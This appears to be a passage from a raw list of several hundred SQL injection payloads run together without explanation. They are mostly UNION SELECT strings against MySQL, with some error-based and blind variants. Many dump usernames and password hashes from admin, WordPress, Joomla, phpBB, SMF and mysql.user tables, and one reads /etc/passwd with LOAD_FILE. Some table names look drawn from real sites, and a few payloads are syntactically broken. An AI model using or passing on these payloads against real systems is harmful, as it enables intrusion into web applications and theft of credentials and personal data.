1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),11,12,13 -- 592 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22 -59300' union select concat_ws(0x2a,database(),version(),user(),@@version_compile_os),2 -- 59302' union select concat_ws(0x3a,login,pass),2 from tbl_users-- -5933 union select 1,AES_DECRYPT(AES_ENCRYPT(email,0x71),0x71),3,4,5,6,7 from advokaty/* -5935 union select concat_ws(0x3a3a,version(),user(),database()),2,3,4,5,6-- -593 union select 1,version(),3,4,5,6,7,8,9,10,11,12 /* 5947 and 1=0 UnIon selECt 1,group_concat(table_name separator '
'),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=0x6239363434 -- 5948' union select 1,2,3,4,5,concat_ws(char(58),user(),database(),version()),7,8,9,10,11,12 -- 594 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8 limit 1,1 -594 union select 1,concat_ws()0x3a,version(),user(),database()),3,4,5,6,7-- -5952 union select 1,2,3,concat_ws(0x3a,id,email,pass,nam),5,6,7,8 from t_users-- -5955 union select 1,2,concat(uname,0x2a,password),4,5,6,7,8 from users -596 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -5974 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,login,20,21,22,23,24,25,26 from admin -- 597-999.9 union select 1,2,concat(user(),database(),version()),4,5,6,7,8,9,10-- -597 union select 1,2,3,concat_ws(0x3a,user_id,username,user_password,user_email),5,6,7,8,9 from phpbb_users limit 0,1/* -597 union select 1,concat_ws(0x3a,user,password),3,4,5 from mysql.user-- -598 union select 1,password,3,4,5,6 from mysql.user/* -598 union select version();-- 5-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 5-999.9 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9 from user-- 5-999.9 union select 1,2,version(),database(),5,6,7,8,9,10-- 5-999.9 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2,3,4,5,6,7-- -599 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- 59 and 1=0 Union Select 1,2,UNHEX(HEX(version())),4,5,6,7,8,9 59 and 1=0 union select 1,version(),3,4,5,6 -- 59 and mid(version(),1,1)=5-- 5.9 union all select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16,17 -- -59 union select 0,group_concat(username,char(58),password) from users -59 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from cinema__user/* -59 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(username,0x3a,password),21 from sys_user/* -59 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3A3a,table_schema,table_name),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables/* -59 union select 1,2,3,4,5,6,concat(user_name,char(58),user_password),8,9 from mausdb.users LIMIT 0,1 -- -59 union select 1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from admin-- -59 UNION SELECT 1,2,3,4,5,user,7 from mysql.user/* 59 union select 1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,version(),database(),USER(),SESSION_USER(),LAST_INSERT_ID(),13,14,15,16,17,18,19,20-- -59' union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,0,11,12,13,14,15,16,17 -- -59 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin-- -59 union select 1,2,3,concat_ws(0x3a3a,id_contact,user,password,id_group),5 from adm_usuarios limit 1,1 -- -59 union select 1,2,3,table_name,5 from information_schema.tables -- -59 union select 1,2,aes_decrypt(aes_encrypt(version(),1),1),4,5,6,7 59 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12 from user limit 1,1 59 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8 -- -59 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),4,5,6,7,8,9,10/* -59 union select 1,concat(username,0x3a,user_password) from users/* 59 union select 1,concat(Version(),0x3a,USER(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/* -59 union select 1,concat_Ws(0x3a3a,username,password),3,4,5,6,7,8,9,10 from www_users -- -59 union select concat(username,char(58),password) from users -- 5' and 0 union select 1,2,3,4,5,concat_ws(0x3a,user,password),7,8,9 from user limit 0,1 -- 5' and 1=0 union select 111,222,333,concat_ws(version(),0x3a,database(),0x3a,user()),555,666 from -- 5 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,9,10 -- 5 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,UNHEX(HEX(concat_ws(Login,0x3a,Password))),13,14,15,16,17,18 from str_admins -- 5 and 1=0 union select 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),1),1),6,7,8,9 from admin-- 5 and 1=0 union select 1,2,concat_ws(0x3a,user_id,0x3a,username,0x3a,user_password),4,5,6 from megaforum.forum_users-- 5 and 1=0 union select 1,2,version(),4,5,6/* 5 and 1=0 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11-- 5 and 1=0 UNION SELECT 1,version() -- 5 and 1=0 union select 1,version(),3,4-- 5 and 1=0 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12/* 5 and 1=0 union select concat(username,0x3a,password),2 from jos_users -- -5 and 1=0 union select concat_ws(0x3a,version(),user(),database()),2,3,4-- 5 and 1=0 union select version()-- 5 and 1=1 union all select 1,concat(username,char(58),password),3,4,5 from tt_users/* -5 and 1=2 union all select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8 -- 5 and 1=2 union select 1,2,3,(0x3120616e6420313d3220756e696f6e2073656c65637420312c322c332c67726f75705f636f6e636174286c6e616d652c307833612c706173732c307833612c656d61696c292066726f6d207573657273202d2d2031),5,6,7,8,9,10,11,12 5' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,version(),user(),database())/* 5 and 1=2 union select 1,2,concat(user(),char(58),database(),char(58),version()),4/* 5 and 1=2 union select 1,2,concat(user(),char(58),version(),char(58),database()),4,5,6/* 5 and 1=2 union select 1,concat(user(),char(58),database(),char(58),version()),3,4/* -5 and 1=2 union select 1,concat(@@version,0x0a,user(),0x0a,database(),0x0a,@@version_compile_os),3 -- -5 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os) -- 5 and 1=(select first 1 distinct rdb$relation_name from rdb$relations where rdb$system_flag=0)-- 5 and 5=substring(version(),1,1) 5 AND ascii(lower(substring(database(),1,1)))>1 5' AND ascii(lower(substring(user(),1,1)))='109m 5' AND ascii(lower(substring(version(),2,1)))='46. 5' AND ascii(lower(substring(version(),8,1)))='0 5' and ascii(substring(user(),1,1))='114r 5' and substring(version(),1,1)='3 5' or(1,1)=(select count(0),concat((select concat_ws(0x3a,table_name,column_name) from information_schema.columns where column_name LIKE '%25password%25' LIMIT 1,1),floor(rand(0)*2))from(information_schema.tables)GROUP BY 2)-- -5 or 1=2 union all select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),3-- 5' or 1=(select top 1 cast(username as nvarchar) ':' cast(password as nvarchar) from users where id=4)-- 5 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(concat_ws(0x3a,user(),database(),version()),floor(rand(0)*2)))-- -5 union all select 1,2,concat_ws(user(),database(),@@version_compile_os),4,5,6,7,8,9,10-- 5 union all select 1,concat_ws(0x3a,version(),database(),user()),3,4-- 5 union select 0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4/* -5 union select 0,concat(0x3a,@@version,user(),database(),@@version_compile_os),2 -- 5 UNION SELECT 0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 LIMIT 7,1 -- -5 UNION(SELECT 1,2,3,4) -5 union select 1,2,3,4,5,6,7,8-- 5' union select 1,2,3,4,5,6,7,8/* -5 UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1-- -5 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat_ws(0x3a,userid,username,password),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from user/* 5 union select 1,2,3,4,5,6,7,8,9,10,11 -5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76 -- -5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 -- -5' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25,26,27-- 5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name,18 from INFORMATION_SCHEMA.TABLES-- -5 union select 1,2,3,4,5,6,7,8,9,10,11,12 from mysql.user/* -5 union select 1,2,3,4,5,6,7,8,9,10,11,12,group_concat(concat(id,'ll',fname,'ll',name,'ll',email,'ll',homepage) separator 0x0a),14 from persons/* 5 union select 1,2,3,4,5,6,7,8,9,10,11,concat(user(),char(58),database(),char(58),version()),13,14/* -5 union select 1,2,3,4,5,6,7,8,9,10,concat(version(),char(58,58),database(),char(58,58),user()),12,13,14,15,16,7,18,19,20,21,22/* -5 union select 1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14,15,16/* -5 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16/* -5 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12 from users -- -5' union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17-- -5 union select 1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user 5 union select 1,2,3,4,5,6,7,concat(version(),char(58),user()),9 from users/* -5 union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12,13,14,15-- -5 union select 1,2,3,4,5,6,7,version() -5 union select 1,2,3,4,5,6,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),8,9,10,11 -5 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19-- -5 union select 1,2,3,4,5,6,concat_ws(0x3a,member_login_key),8,9,10 from u53265.ibf_members where name=0x5a7978-- 5 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- 5 union select 1,2,3,4,5,6 from admin_users/* -5 union select 1,2,3,4,5,6,group_concat(apass,char(58),name,char(58),email),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM job_admin_login-- -5 union select 1,2,3,4,5,concat(user(),0x3a,version()),7,8,9,0 -5 union select 1,2,3,4,5,concat_ws(0x3a3a,username,password),7 from user -- -5 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16 -- -5 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),7,8,9,0 -5 union select 1,2,3,4,5,group_concat(0x0b,column_name),7,8,9,10,11,12,13 from information_schema.columns where table_name=0x64635f75736572 -5' union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a,admin_login,admin_passwd))),7,8,9,10,11,12,13,14 from administrators limit 0,1/* -5 union select 1,2,3,4,5,version(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -5 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from angic_users/* -5 union select 1,2,3,4,concat(password,0x3a,username),6,7,8 from sml_users-- 5 UNION SELECT 1,2,3,4,CONCAT(Version(),Database(),User()),6,7-- -5 union select 1,2,3,4,concat_ws(0x20203a3a2020,user(),version(),database()),6,7,8,9,10,11,12,13 5 union select 1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8 from v2_users-- 5' union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7 -- -5' union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,11,12 -- -5' union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,0,11,12,13,14,1,16,17,18 -- -5 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11/* -5 union select 1,2,3,4,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -5 union select 1,2,3,4,concat_ws(char(58,58),version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -5 union select 1,2,3,4,group_concat(0x0b,pass,0x3a3a,name),6 from 2z__users-- -5 union select 1,2,3,4,username,6,7,8 from user limit 1,1-- -5 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -5 union select 1,2,3,column_name, -5 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user())/* -5 union select 1,2,3,concat(version(),0x3a,user()) -5' union select 1,2,3,concat_ws(0x3a3a,ID_MEMBER,memberName,lastLogin,realName,passwd,emailAddress,websiteUrl,ICQ),5 from smf_members limit 1,1 -- 5 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13 -- -5 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11/* -5 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12/* -5 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5 -- -5 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,0,1,2/* 5 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -5 union select 1,2,3,group_concat(0x0b,column_name),5,6,7 from information_schema.columns where table_name=0x666b5f61646d696e 5 union select 1,2,3,group_concat(0x3C494E4A5F494E464F3E,user(),0x3a,database(),0x3a,version(),0x3C494E4A5F494E464F3E),5,6,7,8,9,10-- -5' uNIoN sELeCT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16 from infOrmAtion_schEmA.tAblEs group by table_Schema limit 1,1 -- -5 union select 1,2,3,group_concat(version(),database(),user()),5,6,7,8,9-- -5 union select 1,2,3,name,5,6,7,8,9,0 from users/* -5' union select 1,2,3,unhex(hex(concat_ws(0x3a,admin_email,admin_login,admin_pass))),5,6,7,8,9,10,11,12,13,14 from administrators/* 5 union select 1,2,3,unhex(hex(concat_ws(0x3a,user(),version(),database()))),5,6,7,8-- 5 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -5 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71) -- -5 union select 1,2,column_name,4 from information_schema.columns where table_name=0x74626c5f61646d696e-- 5 union select 1,2,concat(convert(membername using cp1251),0x3a,convert(passwd using cp1251),0x3a,convert(passwordsalt using cp1251)),4,5,6,7,8,9,10,11,12,13,14 from smf_members/* 5 UNION SELECT 1,2,concat(login,char(58),pass),4,5,6,7,8 from user limit 1,1/* -5 union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12-- -5 union select 1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11 from mysql.user/* -5 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),email,5 from user/* -5 union select 1,2,concat_ws(0x2f,version(),user(),database()),4,5,6,7,8,9/* -5 union select 1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from tbl_user/* -5 UnIon selECt 1,2,concat_ws(0x3a,login,password),4 from admin-- -5 union select 1,2,concat_ws(0x3a,user(),version(),database()),4-- -5 union select 1,2,concat_ws(0x3a,version(),user(),database()) -5 union select 1,2,concat_ws(0x3b, user(),database(),version()),4/* -5 union select 1,2,concat_ws(0x3b,version(),user(),database()),4,5,6,7,8,9,0,1,12 -- -5 union select 1,2,(concat_ws(0x3d,user_pass,user_fname,user_mail)),4,5,6,7,8 from admin_users limit 0,1-- -5 union select 1,2,concat_ws(0x7c,user(),0x7c,database(),0x7c,version()),4,5,6,7,8,9 5' union select 1,2,concat_ws(char(58),screenname,*) from forum_users/* -5 UNION SELECT 1,2,file_priv,4,5 from mysql.user/* -5 union select 1,2 from mysql.user/* -5 union select 1,2,group_concat(0x3a,username,0x3a,password),4,5 from admin_mst -5 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables-- -5 union select 1,2,group_concat(table_name),4 from information_schema.tables-- -5 union select 1,2,LOAD_FILE('/etc/passwd'),4,5 -5 union select 1,2,password,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,19 from admin-- -5 union select 1,2,table_name,4,5,6,7 from information_schema.tables limit 20,1 -- -5 union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7 5' union select 1,2,version(),4,5/* 5 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14 -- -5 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,user(),13,14,15,16,17-- -5 union select 1,aes_decrypt(aes_encrypt(concat_ws(char(58),user(),version(),database(),@@version_compile_os),1),1),3,4 from information_schema.tables/* -5 union select 1,aes_decrypt(aes_encrypt(user,0x71),0x71),aes_decrypt(aes_encrypt(password,0x71),0x71),4 from mysql.user/* -5 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),3,4,5,6,7/* -5 union select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name=0x75736572-- 5 UNI_ON SELECT 1,CON_CAT(0x3C623E44617461626173653A3C2F623E20,Database(),0x3C62723E3C623E557365726E616D653A3C2F623E20,User(),0x3C62723E3C623E56657273696F6E3A3C2F423E20,Version()),3 LIMIT 1,1/* 5 union select 1,concat(login,0x3a,pass) from users -5 union select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 from information_schema.columns/* -5 union select 1,concat(user(),char(58),database(),char(58),version()),333,444,555,6,7,8,9,10,11/* -5 union select 1,concat(user_login,0x3a,user_pass),3 from wp_users -5 union select 1,concat(username,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users 5 union select 1,concat(Version(),0x3a,Database(),0x3a,User())-- -5 /*!union*/ select 1,concat(version(),0x3a,database()),3 -- -5 union select 1,concat(version(),0x3a,user(),0x3a,database()),3-- -5' union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5/* -5 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6-- 5 union select 1,concat(version(),database(),user()),3,4,5,6,7-- -5 union select 1,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8-- -5 UNION SELECT 1,concat_ws(0x3a3a,username,password,email),3,4,5,6,7,8,9,10 from users-- -5 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -5 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5-- -5 union select 1,concat_ws(0x3a,id,login,pass),3,4,5 from user/* -5 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7 from sev_users -5 /*!union select*/ 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 -- -5 union select 1,concat_ws(0x3a,version(),database(),user()),3,4# -5 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8 -5 union select 1,concat_ws(0x3a,version(),user(),database ()),3,4,5,6,7,8,9 -5 union select 1,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),3 from INFORMATION_SCHEMA.COLUMNS limit 159,1/* -5 union select 1,concat_ws(user(),version(),database(),@@version_compile_os),3,4,5,6 -5 union select 1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -5 union select 1,convert(concat_ws(0x3A3a,version(),database(),user()) using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -5 union select 1,convert(version() using latin1),3,4,5/* -5 union select 1,count(table_name),user(),4 from information_schema.tables/* -5 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -5 union select 1,group_concat(uname,char(58),pass,char(58),level,char(58),web -5 union select 1,group_concat(username,0x3a,user_password),3,4,5,6,7 from archkku_mb.users-- -5 UNION(SELECT 1,log,3,pas from users) Limit $i,1"); -5 union select 1,password,3,4,username,6,7,8,9,10,11 from jos_users -5 union select 1,table_name,3,4,5,6,7 from information_schema.tables limit 21,1/* -5 UNION(SELECT 1,TABLE_NAME,3,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS) Limit $i,1"); -5' union select 1,table_name from INFORMATION_SCHEMA.TABLES limit 3,4/* 5 union select 1,unhex(hex(concat_ws(0x3a3a,version(),user(),database()))),3,4,5,6,7,8,9,10,11,12,13,14/* -5 union select 1,user()/* -5 union select 1,user,3,pass,5 from users -5 UNION SELECT 1,username,user_password,user_icq FROM forum_users/* -5 UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user/* -5 union select 1,usesuper||chr(58)||passwd from pg_user LIMIT 1 OFFSET 0-- -5 union select 1,version() -5 union select 1,version(),3,4-- -5 union select 1,version(),3,4-- -5 union select 1,version(),concat_ws(0x3a,user,password) from mysql.user limit 0,1/* -5 union select 1,version(),database(),user(),5,6-- -5 union select 1,version(),group_concat(0x0b,column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x757365726C6F67696E -- -5 union select concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),2,3,4,5,6-- -5 UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4 -5 union select concat(login,0x3a,password),2 from users/* -5 union select concat(user(),char(59),database())/* -5 union select concat_ws(0x3a3a,version(),database(),user()),2,3,4,55.0.45-Debian_1ubuntu3.4-log::sj_cms::shonenjump@vpersuadertron -5 UNION SELECT concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- 5 UNION SELECT concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5 -5 union select concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8-- -5 union select convert(concat_ws(char(58),version(),user(),database()) using latin1)/* 5 union select Email_address,User_password from user/* -5 union select group_concat(0x0b,table_name),2,3,4,5,6,7,8,9,10 from information_schema.tables-- -5 union select group_concat(column_name) from information_schema.columns where table_name=0x43686F6963653241646D -- -5 union select group_concat(u_login,0x3a,u_pass),2,3,4 from tbl_brain_users-- -5 union select null,version()/* -5 union select passwd,2,3,login,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from users/* -5 union select unhex(hex(concat_ws(0x3a,0x78,database(),user(),version())))/* -5 UniOn SEleCt unhex(hex(user())) -- -5' union select version()/* -5 union select version() from information_schema.tables /* 5 union select version(),table_name from information_schema.columns where column_name=0x70617373776f7264/* -600 union select concat_ws(0x3a,concat_ws(0x3a,user(),version()),database())/* 600 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2,3-- -600 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8-- 600 union select group_concat(username,0x3a,password),2,3 from pec_users-- -600 union select user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 601111 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database())-- -6013 union select version()# 602 and 1=0 union select 0,1,2,3,4,group_concat(username,0x3a,password,0x3a,email) from jos_users-- 602 or(1,2)=(select * from(select name_const(concat_ws(0x3a,version(),user(),database()),1),name_const(concat_ws(0x3a,version(),user(),database()),1))a)-- -603 or 1=(select top 1 table_name from information_schema.tables) 6041111 union select 1,2,password,user,5,6 from mysql.user/* -6041 union select concat(user,char(58),password),2,3,4,5,version(),7,8 from mysql.user/* -604 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14-- -605' union select 1,version(),3,4,5,6,7 from user/* -60634 UnIon selECt 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20-- 606 and 1=0 union select 1,2-- -6074 union select 1,2,group_concat(schema_name),4,5,6,7,8,9,10,11 from information_schema.schemata-- -607 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14 from users/* -607 union select 1,2,3,version(),user(),database(),7,8,9/* -607 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)-- 6082 union select version(),2-- -6089343 UNION SELECT 1,2,3,4,5,6,7,USER(),version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -608 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36 from users-- -608' union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),13,14,15,16,17 -- -608 union select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns/* 608 union select 1,login,passw,4,5,6,7,8,9,10,11 from cms_admins/* 60' and 0 union select 1,concat_ws(80x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 60 and 1=0 union select 1,2,version(),4,5,6 -- -60 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),user(),database()),16,17-- -60 union select 1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 from user -- -6.0 UNION SELECT 1,2,3,4,5,6,7,8,9,concat_ws(0x2b,version(),user(),@@version_compile_os),11 -- -60 union Select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,name,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from ot_users/* -60 union select 1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from information_schema.tables limit 1,1/* 60 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19 limit 1,1/* -60 UNioN/**/ /**/SElEct 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_schema.tables -- -60 union select 1,2,3,4,CONVERT(table_name using latin1),6 from information_schema.tables/* 60 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),5,6,7,8,9,10 LIMIT 1,1-- -60 union select 1,2,aes_decrypt(aes_encrypt(version(),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -60' union select 1,2,version()/* -60 union select 1,2,version(),4,5,6,7,8,9-- -60 union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9 from mysql.user-- -60 union select pass from users -- 610098098760 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -61009 UNION SELECT 1,2,3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where table_name=0x627573696e657373-- -610 and 1=2 union select 1,concat(username,0x20,password),3,4 from users limit 3,1-- -610 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9 from users/* -610 union select 1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5 -- -611' union select 1,2,3,4,5,6,7,8,9 from authors -- -611 union select 